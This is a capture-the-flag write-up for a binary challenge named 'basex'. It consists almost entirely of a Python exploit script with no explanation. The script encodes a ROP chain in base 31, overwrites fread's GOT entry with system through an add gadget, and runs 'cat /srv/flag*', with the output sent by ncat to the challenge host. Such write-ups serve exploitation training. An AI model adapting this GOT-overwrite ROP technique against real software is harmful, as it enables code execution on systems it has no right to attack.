Tags: ropchain rop 

Rating: 1.0

```
# python3 spl.py | ncat basex.challs.malice.fr 4444

import binascii

def convert_to_base31(num):
digits = []
for i in range(20):
digits.append(num % 31)
num //= 31

digits = [chr(48 + d) for d in digits]

return "".join(reversed(digits))

def write_to_mem(addr, data):
print(convert_to_base31(data), end="")
print("%020d" % ((517 + addr)<<32), end="")
print("0"*40, end="")

write_to_mem(0, 0x4004ee) # ret 0x4008f3
write_to_mem(1, 0x4008f3) # pop rdi ; ret

write_to_mem(3, 0x40075f) # pop rbx ; pop rbp ; ret

write_to_mem(4, 2**32 - (0x6D710 - 0x41CD0)) # rbx (fread - system)
write_to_mem(5, 0x601018 + 0x3d) # # rbp (fread)
write_to_mem(6, 0x4005f8) # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
write_to_mem(7, 0x400500) # call fread

write_to_mem(28, int(binascii.hexlify(b"cat /srv"[::-1]).decode(), 16))
write_to_mem(29, int(binascii.hexlify(b"/flag*\0\0"[::-1]).decode(), 16))
```